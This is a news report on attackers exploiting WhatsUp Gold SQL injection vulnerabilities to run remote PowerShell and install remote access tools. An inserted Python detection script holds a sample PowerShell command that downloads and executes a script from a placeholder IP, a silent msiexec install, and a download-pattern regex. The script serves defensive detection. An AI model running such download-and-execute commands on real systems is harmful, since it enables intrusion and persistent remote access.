
Hackers Attack WhatsUp Gold Using Vulnerability Since August

Hackers are using publicly available exploit code to attack two critical vulnerabilities in Progress Software’s WhatsUp Gold network availability and performance monitoring solution.

The two vulnerabilities exploited in attacks since August 30 are SQL injection vulnerabilities tracked as CVE-2024-6670 and CVE-2024-6671. They allow for the retrieval of encrypted passwords without authentication.

Even though the vendor addressed the security issues more than two weeks ago, many organizations still need to update their software, and cybercriminals are taking advantage of the delay.

Progress Software released security updates on August 16 to address these issues, and added instructions on how to detect potential threats in a September 10 security bulletin.

Security researcher Sina Kheirkhah (@SinSinology) discovered the vulnerabilities and reported them to the Zero Day Initiative (ZDI) on May 22. On August 30, he published proof-of-concept (PoC) exploits.

In a white paper, the researcher explains how the lack of user input sanitization can be exploited to write arbitrary passwords into the password fields of administrator accounts, leaving those accounts open to takeover.

Kheirkhah's exploits review
Source: summoning.team

In-the-wild exploitation

A report published today by cybersecurity firm Trend Micro found that hackers have begun exploiting these vulnerabilities. According to its observations, the attacks follow Kheirkhah’s PoC, bypassing authentication and proceeding to the remote code execution and payload deployment stage.

“Trend Micro researchers identify remote code execution attacks on WhatsUp Gold using Active Monitor PowerShell script since August 30” – Trend Micro

The security firm’s telemetry showed the first signs of active exploitation five hours after the researcher published the PoC exploit code.

Attackers abuse the legitimate Active Monitor PowerShell Script functionality of WhatsUp Gold to run, via NmPoller.exe, multiple PowerShell scripts downloaded from remote URLs.

Malicious PowerShell script deployed by attackers
Source: Trend Micro

Attackers then use the legitimate Windows tool “msiexec.exe” to install various remote access tools (RATs) via MSI packages, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote.
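As an added illustration (not code from the article, Trend Micro or Progress Software), the following Python script applies the two observations above to constructed Sysmon-style process-creation events: PowerShell spawned by NmPoller.exe whose command line fetches a remote URL, and msiexec.exe running underneath such a PowerShell process. The install directory, PIDs, script names and the URL are constructed placeholders, and the set of download markers is an assumption adequate only for this sample.

```python
import re
from dataclasses import dataclass

# Command-line markers of a script pulling a remote payload (assumption: adequate for this sample)
REMOTE_FETCH_RE = re.compile(
    r"https?://|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I)
POLLER, SHELLS = "nmpoller.exe", {"powershell.exe", "pwsh.exe"}

@dataclass
class ProcEvent:  # minimal Sysmon Event ID 1-style process-creation record
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str

def _name(path): return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, pid) alerts; events must be in creation order (parents before children)."""
    alerts, tainted = [], set()  # tainted: pids descended from PowerShell spawned by the poller
    for e in events:
        img, parent = _name(e.image), _name(e.parent_image)
        if e.ppid in tainted:
            tainted.add(e.pid)
        if parent == POLLER and img in SHELLS:
            tainted.add(e.pid)  # Active Monitor scripts run here, so track every one of them
            if REMOTE_FETCH_RE.search(e.command_line):
                alerts.append(("WUG-1 poller-spawned PowerShell fetches a remote URL", e.pid))
        if img == "msiexec.exe" and e.pid in tainted:
            alerts.append(("WUG-2 msiexec.exe launched under poller-spawned PowerShell", e.pid))
    return alerts

# Constructed sample events (not real telemetry); install dir is a placeholder, IP is TEST-NET-3
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WUG = r"C:\WUG_INSTALL_DIR\NmPoller.exe"
SAMPLE = [
    ProcEvent(100, 50, WUG, r"C:\Windows\System32\services.exe", "NmPoller.exe"),
    ProcEvent(200, 100, PS, WUG, "powershell.exe -nop -w hidden -c \"IEX (New-Object "
              "Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')\""),
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe", PS,
              r"msiexec.exe /i C:\Windows\Temp\agent.msi /qn"),
    ProcEvent(400, 100, PS, WUG, r"powershell.exe -File C:\Scripts\check_disk.ps1"),  # benign
    ProcEvent(500, 60, r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              r"msiexec.exe /i C:\Users\admin\Downloads\tool.msi"),  # admin install, not flagged
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE):
        print(f"ALERT pid={pid}: {rule}")
```

Local Active Monitor scripts (event 400) are tracked but not alerted on, so a deployment should baseline the scripts it legitimately runs and treat any other PowerShell child of NmPoller.exe as worth a look.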

Deploying these RATs allows attackers to establish persistence on compromised systems. In some cases, Trend Micro observed multiple payloads being deployed on the same host.

Analysts were unable to attribute these attacks to any particular threat group, but the use of multiple RATs suggests the activity may be the work of ransomware operators.

Attack flow of observed activity
Source: Trend Micro

In a comment to BleepingComputer, Kheirkhah thanked ZDI and expressed hope that his write-ups and proofs of concept will help improve the security of the affected product in the future.

This is not the first time this year that WhatsUp Gold has been targeted through publicly disclosed security flaws.

In early August, threat intelligence organization Shadowserver Foundation reported that its honeypots had detected attempts to exploit CVE-2024-4885, a critical remote code execution vulnerability disclosed on June 25, 2024.

That vulnerability was also discovered by Kheirkhah, who published full details on his blog two weeks after the disclosure.